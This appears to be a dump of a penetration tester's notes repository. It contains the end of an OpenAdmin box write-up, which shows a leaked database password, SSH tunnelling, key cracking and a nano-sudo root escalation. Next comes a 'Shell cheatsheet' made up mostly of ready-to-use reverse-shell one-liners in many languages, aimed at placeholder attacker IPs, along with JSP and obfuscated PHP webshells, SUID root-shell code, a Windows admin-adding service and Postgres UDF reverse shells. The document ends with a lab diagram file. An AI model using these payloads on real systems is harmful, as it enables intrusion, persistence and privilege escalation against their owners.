122 | `2020/02/14 22:35:20 CMD: UID=33 PID=7150 | sh -c php -l /opt/ona/www/local/config/database_settings.inc.php `
123 |
124 | I decide to analyze the contents of the `database_settings.inc.php` file:
125 |
126 | ```php
127 |
131 | array (
132 | 'databases' =>
133 | array (
134 | 0 =>
135 | array (
136 | 'db_type' => 'mysqli',
137 | 'db_host' => 'localhost',
138 | 'db_login' => 'ona_sys',
139 | 'db_passwd' => 'n1nj4W4rri0R!',
140 | 'db_database' => 'ona_default',
141 | 'db_debug' => false,
142 | ),
143 | ),
144 | 'description' => 'Default data context',
145 | 'context_color' => '#D3DBFF',
146 | ),
147 | );
148 | ```
149 |
150 | **We have a password!** Let's try using it to log in as **jimmy**... it works!
151 |
152 |
153 | ## Lateral movement to Joanna
154 |
155 | Now that we have a shell as jimmy, our goal is to become **joanna**, as this user will take us to the root.
156 |
157 | Since we have new privileges compared to before, we are able to enumerate the machine in more depth, for example the `/var/www/internal/` folder, which seems to suggest the _presence of a web page that can only be visited from inside_ the machine, which is why we could not find it via **dirbuster** before.
158 |
159 | 
160 |
161 | The confirmation is obtained from the _Apache configuration file_, which tells us that on **port 52846** there is a virtual host running as **joanna**, exposing the pages contained in `/var/www/internal/`.
162 |
163 | 
164 |
165 | At this point, there are different ways to go over the obstacle:
166 |
167 | 1. SSH Port Forwarding
168 | 2. local **curl**
169 | 3. Write a PHP shell in the `/var/www/internal/` directory
170 |
171 |
172 |
173 | > In this writeup we will deal with the port forwarding approach.
174 |
175 | I used the OpenAdmin box as an **SSH tunnel** on the Kali **local port 12345**, and through **SwitchyOmega** I used port 12345 as a **proxy** so that when I visited http://127.0.0.1:52846 I was actually visiting the OpenAdmin machine locally.
176 |
177 | 
178 |
179 | In this way we can interact with the web application as if it was an exposed application.
180 |
181 | Having access to the `/var/www/internal/` folder, it was possible to **review the source contents** in search of any vulnerabilities or bypass techniques.
182 | The `index.php` page, for example, logs a user in by checking the supplied input against a hard-coded hash:
183 |
184 | ```php
185 |
197 | ```
198 |
199 | It is therefore easy to bypass the check, either by deciding to **crack the hash** (which turns out to be a SHA512 of the password _Revealed_), or, since we have read/write access to the source, by replacing the check with one of our choosing.
200 |
201 | Once the check is bypassed, we will find ourselves on the `main.php` page with **Joanna**'s private RSA key shown on screen.
202 |
203 | 
204 |
205 | Let's copy it into the **joanna.txt** file and give it to **ssh2john** in order to generate a hash that can be cracked with **john**:
206 |
207 | 
208 |
209 | We have Joanna's password!
210 |
211 |
212 | ## Privilege Escalation
213 |
214 | The Privilege Escalation process is the easiest and fastest I've ever seen.
215 | By running the `sudo -l` command we notice how the user **joanna** can open the `/opt/priv` file via the **nano** text editor as root user.
216 |
217 | 
218 |
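219 | We just have to run the command and, within nano, use the **code execution feature** to be able to run commands as root! A sudo rule that starts an interactive editor as root is effectively a root shell; `sudoedit` avoids this because the editor itself runs as the invoking user.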
220 |
221 | 
222 |
223 |
224 | ## Trophy
225 | > It's never too late to start.
226 | > \- Me, Myself and I
227 |
228 | ## License
229 | Author: 0x*bro*
230 | [](http://creativecommons.org/licenses/by-nc/4.0/)
231 | This work is licensed under a [Creative Commons Attribution-NonCommercial 4.0 International License](http://creativecommons.org/licenses/by-nc/4.0/).
--------------------------------------------------------------------------------
/Cheatsheets/Shell cheatsheet.md:
--------------------------------------------------------------------------------
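1 | Reverse shell, bind shell and web shell for all the things! Nearly every reverse-shell one-liner below does the same two things (opens an outbound TCP connection, then attaches a shell's stdin/stdout/stderr to it), so an interpreter or service process spawning `/bin/sh`, `bash -i` or `cmd.exe` with a socket on its standard descriptors is the common signal to alert on.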
2 | # Bash
3 |
4 | ```bash
5 | exec /bin/bash 0&0 2>&0
6 | ```
7 |
8 | ```bash
9 | 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
10 | ```
11 |
12 | ```bash
13 | exec 5<>/dev/tcp/ATTACKING-IP/80
14 | cat <&5 | while read line; do $line 2>&5 >&5; done
15 |
16 | # or:
17 |
18 | while read line 0<&5; do $line 2>&5 >&5; done
19 | ```
20 |
21 | ```bash
22 | bash -i >& /dev/tcp/ATTACKING_IP/80 0>&1
23 | /bin/bash -c 'bash -i >& /dev/tcp/ATTACKING_IP/443 0>&1'
24 | ```
25 |
26 | # Python
27 |
28 | ```python
29 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
30 | ```
31 |
32 | # Socat
33 |
34 | ```bash
35 | socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &
36 | ```
37 |
38 | # Golang
39 |
40 | ```go
41 | echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
42 | ```
43 |
44 | - https://github.com/SaDs3c/goshell
45 |
46 | # PHP
47 |
48 | ```php
49 | php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
50 | (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
51 | ```
52 |
53 | ```php
54 | & /dev/tcp/"ATTACKING IP"/443 0>&1'");?>
55 | & /dev/tcp/AttackerIP/port 0>&1');?>
56 | ```
57 |
58 | ```php
59 | &3 2>&3");'?>
60 | &3 2>&3");'?>
61 | &3 2>&3`;'?>
62 | &3 2>&3");'?>
63 | &3 2>&3", "r");'?>
64 | ```
65 |
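66 | Base64 encoded (Base64 is an encoding, not encryption: it hides the payload from naive string matching but is trivially reversible)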
67 |
68 | ```php
69 | =$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
70 | ```
71 |
72 | # Netcat
73 |
74 | - [Bind shell](../Tools/netcat.md#Bind%20shell)
75 | - [Reverse shell](../Tools/netcat.md#Reverse%20shell)
76 |
77 | ```bash
78 | /bin/sh | nc ATTACKING-IP 80
79 | ```
80 |
81 | ```bash
82 | rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING_IP 4444 0/tmp/p
83 | ```
84 |
85 | OpenBSD:
86 |
87 | ```bash
88 | mkfifo /tmp/lol;nc ATTACKER_IP PORT 0&1 | tee /tmp/lol
89 | ```
90 |
91 | # Powershell
92 |
93 | - [powercat](../Tools/powercat.md#shell)
94 | - [Powershell for pentesters](Dev,%20ICT%20&%20Cybersec/Dev,%20scripting%20&%20OS/Powershell%20for%20pentesters.md#Shell)
95 | - [Empire](../Tools/Empire.md)
96 | - [powersploit](../Tools/powersploit.md)
97 | - [nishang](https://github.com/samratashok/nishang)
98 |
99 | # Node.js
100 |
101 | ```jsx
102 | require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
103 | ```
104 |
105 | ```js
106 | (function(){
107 | var net = require("net"),
108 | cp = require("child_process"),
109 | sh = cp.spawn("/bin/sh", []);
110 | var client = new net.Socket();
111 | client.connect(8080, "192.168.1.1", function(){
112 | client.pipe(sh.stdin);
113 | sh.stdout.pipe(client);
114 | sh.stderr.pipe(client);
115 | });
116 | return /a/; // Prevents the Node.js application form crashing
117 | })();
118 | ```
119 | # Telnet
120 |
121 | ```bash
122 | rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING_IP 80 0/tmp/p
123 | ```
124 |
125 | ```bash
126 | telnet ATTACKING_IP 80 | /bin/bash | telnet ATTACKING_IP 443
127 | ```
128 |
129 | # Perl
130 |
131 | ```perl
132 | perl -e 'use Socket;$i="ATTACKING_IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
133 | ```
134 |
135 | Windows:
136 |
137 | ```perl
138 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING_IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
139 | ```
140 |
141 | ```perl
142 | perl -e 'use Socket;$i="ATTACKING_IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
143 | ```
144 |
145 | # Ruby
146 |
147 | ```ruby
148 | ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
149 | ```
150 |
151 | # Java
152 |
153 | ```java
154 | r = Runtime.getRuntime()
155 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
156 | p.waitFor()
157 | ```
158 |
159 | # JSP
160 |
161 | ```java
162 | <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
163 | ```
164 |
165 | ```java
166 |
170 | <%@ page import="java.io.*" %>
171 | <%
172 | String cmd = request.getParameter("cmd");
173 | String output = "";
174 | if(cmd != null) {
175 | String s = null;
176 | try {
177 | Process p = Runtime.getRuntime().exec(cmd,null,null);
178 | BufferedReader sI = new BufferedReader(new
179 | InputStreamReader(p.getInputStream()));
180 | while((s = sI.readLine()) != null) { output += s+""; }
181 | } catch(IOException e) { e.printStackTrace(); }
182 | }
183 | %>
184 | <%=output %>
185 | ```
186 | ## Tomcat (.war)
187 |
188 | ```bash
189 | mkdir webshell
190 | cp index.jsp webshell
191 |
192 | cd webshell
193 | jar -cvf ../webshell.war *
194 | added manifest
195 | adding: index.jsp(in = 579) (out= 351)(deflated 39%)
196 | ```
197 |
198 | ## Axis (.aar)
199 |
200 | Minimal [[AXIS2]] webshell
201 |
202 | ```cardlink
203 | url: https://github.com/Lexus89/AxisInvoker
204 | title: "GitHub - Lexus89/AxisInvoker: Minimal AXIS2 webshell"
205 | description: "Minimal AXIS2 webshell. Contribute to Lexus89/AxisInvoker development by creating an account on GitHub."
206 | host: github.com
207 | favicon: https://github.githubassets.com/favicons/favicon.svg
208 | image: https://opengraph.githubassets.com/78e32670a32a1b76f36b1078425c0e9845fb3adb077a83480e6918387d5fb368/Lexus89/AxisInvoker
209 | ```
210 |
211 | # C
212 |
213 | Reverse shell:
214 |
215 | ```c
216 | #include
217 | #include
218 | #include
219 | #include
220 | #include
221 | #define REMOTE_ADDR "10.13.14.15"
222 | #define REMOTE_PORT 443
223 | int main(int argc, char *argv[])
224 | {
225 | struct sockaddr_in sa;
226 | int s;
227 |
228 | sa.sin_family = AF_INET;
229 | sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
230 | sa.sin_port = htons(REMOTE_PORT);
231 |
232 | s = socket(AF_INET, SOCK_STREAM, 0);
233 | connect(s, (struct sockaddr *)&sa, sizeof(sa));
234 | dup2(s, 0);
235 | dup2(s, 1);
236 | dup2(s, 2);
237 |
238 | execve("/bin/sh", 0, 0);
239 | return 0;
240 | }
241 |
242 | ```
243 |
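244 | Spawn shell (only for SUID-root binaries: the shell that `system` starts drops the effective uid and gid when they differ from the real ones, and the `setuid(0)`/`setgid(0)` calls that prevent this only succeed when the effective uid is already root):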
245 |
246 | ```c
247 | // gcc -o /tmp/rootshell /tmp/rootshell.c
248 | // chmod u+s /tmp/rootshell
249 | #include
250 | #include
251 | #include
252 | int main(void)
253 | {
254 | setuid(0); setgid(0); system("/bin/bash");
255 | }
256 | ```
257 |
258 | Spawn shell (for every suid user binary):
259 |
260 | ```c
261 | #include
262 | #include
263 |
264 | int main(int argc, const char * argv[]){
265 | if (argc > 1) printf("%s", execvp(argv[1], &argv[1]));
266 | return 0;
267 | }
268 | ```
269 |
270 | ```c
271 | // gcc -o /tmp/rootshell /tmp/rootshell.c
272 | // chmod u+s /tmp/rootshell
273 | #include
274 | #include
275 | #include
276 | int main(void)
277 | {
278 | execlp("/bin/id", "id", NULL);
279 | }
280 | ```
281 |
282 | Windows command execution binary:
283 | ```c
284 | #include
285 | #include
286 |
287 | #define SLEEP_TIME 5000
288 |
289 | SERVICE_STATUS ServiceStatus;
290 | SERVICE_STATUS_HANDLE hStatus;
291 |
292 | void ServiceMain(int argc, char** argv);
293 | void ControlHandler(DWORD request);
294 |
295 | //add the payload here
296 | int Run()
297 | {
298 | system("cmd /k net localgroup administrators user /add");
299 | return 0;
300 | }
301 |
302 | int main()
303 | {
304 | SERVICE_TABLE_ENTRY ServiceTable[2];
305 | ServiceTable[0].lpServiceName = "MyService";
306 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
307 |
308 | ServiceTable[1].lpServiceName = NULL;
309 | ServiceTable[1].lpServiceProc = NULL;
310 |
311 | StartServiceCtrlDispatcher(ServiceTable);
312 | return 0;
313 | }
314 |
315 | void ServiceMain(int argc, char** argv)
316 | {
317 | ServiceStatus.dwServiceType = SERVICE_WIN32;
318 | ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
319 | ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
320 | ServiceStatus.dwWin32ExitCode = 0;
321 | ServiceStatus.dwServiceSpecificExitCode = 0;
322 | ServiceStatus.dwCheckPoint = 0;
323 | ServiceStatus.dwWaitHint = 0;
324 |
325 | hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
326 | Run();
327 |
328 | ServiceStatus.dwCurrentState = SERVICE_RUNNING;
329 | SetServiceStatus (hStatus, &ServiceStatus);
330 |
331 | while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
332 | {
333 | Sleep(SLEEP_TIME);
334 | }
335 | return;
336 | }
337 |
338 | void ControlHandler(DWORD request)
339 | {
340 | switch(request)
341 | {
342 | case SERVICE_CONTROL_STOP:
343 | ServiceStatus.dwWin32ExitCode = 0;
344 | ServiceStatus.dwCurrentState = SERVICE_STOPPED;
345 | SetServiceStatus (hStatus, &ServiceStatus);
346 | return;
347 |
348 | case SERVICE_CONTROL_SHUTDOWN:
349 | ServiceStatus.dwWin32ExitCode = 0;
350 | ServiceStatus.dwCurrentState = SERVICE_STOPPED;
351 | SetServiceStatus (hStatus, &ServiceStatus);
352 | return;
353 |
354 | default:
355 | break;
356 | }
357 | SetServiceStatus (hStatus, &ServiceStatus);
358 | return;
359 | }
360 | ```
361 |
362 | # Groovy (Jenkins)
363 |
364 | Valid for [Jenkins](../Dev,%20scripting%20&%20OS/Jenkins.md)
365 |
366 | Reverse Shell:
367 |
368 | ```java
369 | String host="localhost";
370 | int port=8044;
371 | String cmd="cmd.exe";
372 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
373 | ```
374 |
375 | RCE:
376 |
377 | ```groovy
378 | def sout = new StringBuilder(), serr = new StringBuilder()
379 | def proc = 'ls'.execute()
380 | proc.consumeProcessOutput(sout, serr)
381 | proc.waitForOrKill(1000)
382 | println "out> $sout err> $serr"
383 | ```
384 |
385 | # UDF Postgres
386 |
387 | RCE:
388 |
389 | ```c
390 | #include "postgres.h"
391 | #include
392 | #include "fmgr.h"
393 | #include "utils/geo_decls.h"
394 | #include
395 | #include "utils/builtins.h"
396 | #ifdef PG_MODULE_MAGIC
397 | PG_MODULE_MAGIC;
398 | #endif
399 | /* Add a prototype marked PGDLLEXPORT */
400 | PGDLLEXPORT Datum awae(PG_FUNCTION_ARGS);
401 | PG_FUNCTION_INFO_V1(awae);
402 | /* this function launches the executable passed in as the first parameter
403 | in a FOR loop bound by the second parameter that is also passed*/
404 | Datum
405 | awae(PG_FUNCTION_ARGS)
406 | {
407 | /* convert text pointer to C string */
408 | #define GET_STR(textp) DatumGetCString(DirectFunctionCall1(textout,
409 | PointerGetDatum(textp)))
410 | /* retrieve the second argument that is passed to the function (an integer)
411 | that will serve as our counter limit*/
412 | int instances = PG_GETARG_INT32(1);
413 | for (int c = 0; c < instances; c++) {
414 | /*launch the process passed in the first parameter*/
415 | ShellExecute(NULL, "open", GET_STR(PG_GETARG_TEXT_P(0)), NULL, NULL, 1);
416 | }
417 | PG_RETURN_VOID();
418 | }
419 | ```
420 |
421 | Reverse shell:
422 |
423 | ```c
424 | #define _WINSOCK_DEPRECATED_NO_WARNINGS
425 | #include "postgres.h"
426 | #include
427 | #include "fmgr.h"
428 | #include "utils/geo_decls.h"
429 | #include
430 | #include
431 | #include "utils/builtins.h"
432 | #pragma comment(lib, "ws2_32")
433 | #ifdef PG_MODULE_MAGIC
434 | PG_MODULE_MAGIC;
435 | #endif
436 | /* Add a prototype marked PGDLLEXPORT */
437 | PGDLLEXPORT Datum connect_back(PG_FUNCTION_ARGS);
438 | PG_FUNCTION_INFO_V1(connect_back);
439 | WSADATA wsaData;
440 | SOCKET s1;
441 | struct sockaddr_in hax;
442 | char ip_addr[16];
443 | STARTUPINFO sui;
444 | PROCESS_INFORMATION pi;
445 | Datum
446 | connect_back(PG_FUNCTION_ARGS)
447 | {
448 | /* convert C string to text pointer */
449 | #define GET_TEXT(cstrp) \
450 | DatumGetTextP(DirectFunctionCall1(textin, CStringGetDatum(cstrp)))
451 | /* convert text pointer to C string */
452 | #define GET_STR(textp) \
453 | DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
454 | WSAStartup(MAKEWORD(2, 2), &wsaData);
455 | s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL,
456 | (unsigned int)NULL);
457 | hax.sin_family = AF_INET;
458 | /* FIX THIS */
459 | hax.sin_port = XXXXXXXXXXXXX
460 | /* FIX THIS TOO*/
461 | hax.sin_addr.s_addr = XXXXXXXXXXXXXXX
462 | WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
463 | memset(&sui, 0, sizeof(sui));
464 | sui.cb = sizeof(sui);
465 | sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
466 | sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;
467 | CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
468 | PG_RETURN_VOID();
469 | }
470 | ```
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/LAB 1.md:
--------------------------------------------------------------------------------
1 | ---
2 |
3 | excalidraw-plugin: parsed
4 | tags: [excalidraw]
5 |
6 | ---
7 | ==⚠ Switch to EXCALIDRAW VIEW in the MORE OPTIONS menu of this document. ⚠== You can decompress Drawing data with the command palette: 'Decompress current Excalidraw file'. For more info check in plugin settings under 'Saving'
8 |
9 |
10 | # Excalidraw Data
11 |
12 | ## Text Elements
13 | Attacker ^Slz6zZG1
14 |
15 | [[Network 1/Legacy]] ^t9ANyQqJ
16 |
17 | [[Network 1/Writeup]] ^VqOEzuic
18 |
19 | Network 1 ^M3ytJYbA
20 |
21 | [[Network 1/Buff]] ^fmnXaqqz
22 |
23 | [[Network 2/Postman]] ^JC3vAtVW
24 |
25 | [[Network 2/OpenAdmin]] ^oGUJzd8S
26 |
27 | Network 2 ^bRiZ8Wd4
28 |
29 | [[Network 3/Tabby]] ^GfW1J0Tu
30 |
31 | [[Tracerback]] ^NlUCDAXL
32 |
33 | [[Network 2/OpenAdmin]] ^SaemksfH
34 |
35 | Network 3 ^WuVz0Uhu
36 |
37 | double interface ^1XhVqu0t
38 |
39 | Cron Job ^T2gURC3s
40 |
41 | double interface ^45suyew5
42 |
43 | DMZ machine ^23njxREW
44 |
45 | Shared credentials ^fFmUChd3
46 |
47 | ssh -D foo@bar ... ^szDtPy1J
48 |
49 | ## Element Links
50 | LVkaL0Hd: [[Network 1/Buff]]
51 |
52 | %%
53 | ## Drawing
54 | ```compressed-json
55 | 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
90 |
